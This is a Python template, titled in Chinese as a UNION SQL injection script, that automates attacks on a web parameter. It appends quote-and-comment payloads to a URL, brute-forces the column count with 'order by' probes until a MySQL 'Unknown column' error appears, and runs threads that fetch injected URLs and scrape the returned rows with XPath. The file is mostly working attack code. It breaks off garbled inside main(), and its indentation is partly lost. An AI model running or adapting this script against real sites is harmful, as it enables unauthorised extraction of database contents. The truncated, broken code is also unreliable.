UNION联合注入 python脚本模板
import requests
import threading
import queue
from lxml import etree
import re
# Number of worker threads started by main() and of row indices queued
# for them (0 .. NUM-1); each UnionSql thread consumes one index.
NUM=5
# Shared, module-level result collector: every UnionSql.run() appends the
# xpath result list it extracted. Appended from several threads at once;
# list.append is a single bytecode-level operation in CPython, but the
# final order of entries is whatever order the threads finished in.
LIST=[]
# Fixed browser-like User-Agent sent with every request in this module
# (duplicated verbatim inside UnionSql.run). Because it never varies, it is
# a stable value for server-side request logging to key on.
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}
def bypass(payload):
    '''
    Wrap a raw SQL fragment into the string form the rest of this module
    appends to a URL.

    :param payload: SQL fragment, e.g. the " order by {}" string built by
        brute_field_num. A falsy value (None, '') is returned unchanged.
    :return: the fragment prefixed with "' " and suffixed with " --+".
        When the fragment does not contain the substring 'order', a
        ' limit {},1' clause is appended first; its "{}" is left as an
        unfilled str.format placeholder that UnionSql.run fills later with
        the row index, so a fragment that itself contains braces would
        break that later .format call.
    '''
    # NOTE(review): the original file's indentation was lost. The two
    # wrapping assignments are placed inside the `if payload:` guard so a
    # falsy payload never reaches the "' " + payload concatenation (which
    # would raise TypeError for None) — confirm against the original.
    if payload:
        if 'order' not in payload:
            payload+=' limit {},1'
        payload = "' "+payload
        payload += " --+"
    return payload
def brute_field_num(url):
    '''
    Brute-force the number of columns in the queried table by sending
    " order by N" probes with increasing N.

    :param url: base URL; bypass(...) output is concatenated directly onto it,
        so the caller must leave the injectable parameter at the end.
    :return: the number of columns, i.e. N-1 for the first N whose response
        body contains 'Unknown column'. Returns None implicitly if any
        exception is raised (it is printed, not re-raised), so callers that
        do arithmetic or formatting on the result must handle None.
    '''
    try:
        n=1
        # Unbounded: the loop only ends on the 'Unknown column' marker or on
        # an exception. A target that never returns that marker (different
        # DBMS error text, errors suppressed, generic error page) keeps this
        # running indefinitely; requests.get is also called without a timeout.
        while True:
            payload=url+bypass(" order by {}".format(n))
            # Every probe URL is echoed to stdout.
            print(payload)
            res=requests.get(payload,headers=headers)
            # Marker is the MySQL error text for an out-of-range ORDER BY
            # position leaking into the page body.
            if 'Unknown column' in res.text:
                return n-1
            n+=1
    except Exception as e:
        # Broad catch: network errors and anything else are printed and
        # swallowed; the function then falls through and returns None.
        print(e)
class UnionSql(threading.Thread):
    '''
    Worker thread: takes one row index from the shared queue, fills it into
    the URL template, fetches the page, and appends the xpath extraction
    result to the module-level LIST.
    '''
    def __init__(self,url,xpath,q):
        # URL template containing a "{}" placeholder that run() fills with
        # the row index taken from the queue.
        self.url=url
        # XPath expression evaluated against the fetched HTML.
        self.xpath=xpath
        # Shared queue.Queue of row indices (filled by main()).
        self.q=q
        super().__init__()
    def run(self):
        # `global LIST` is not needed for LIST.append (it mutates, not
        # rebinds), but it is harmless and kept as written.
        global LIST
        # Local copy shadows the module-level `headers`; both hold the same
        # fixed User-Agent string.
        headers={
            'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}
        # Unused local; left as in the original.
        str1 = ''
        # Blocks forever if the queue is empty (Queue.get with no timeout);
        # main() is expected to have queued exactly one index per thread.
        n=self.q.get()
        payload=self.url.format(n)
        # No timeout on the request; an unresponsive server blocks this thread.
        res=requests.get(payload,headers=headers).text
        # NOTE(review): lxml's etree.HTML returns None for an empty document,
        # in which case the .xpath call below raises AttributeError inside
        # the thread (printed by threading, not propagated) — confirm.
        html=etree.HTML(res)
        text=html.xpath(self.xpath)
        # Result order in LIST depends on thread completion order, not on n.
        LIST.append(text)
def main(url,xpath):
q = queue.Queue()
thread_list = []
for n in range(NUM):
q.put(n)
for n in range(NUM)<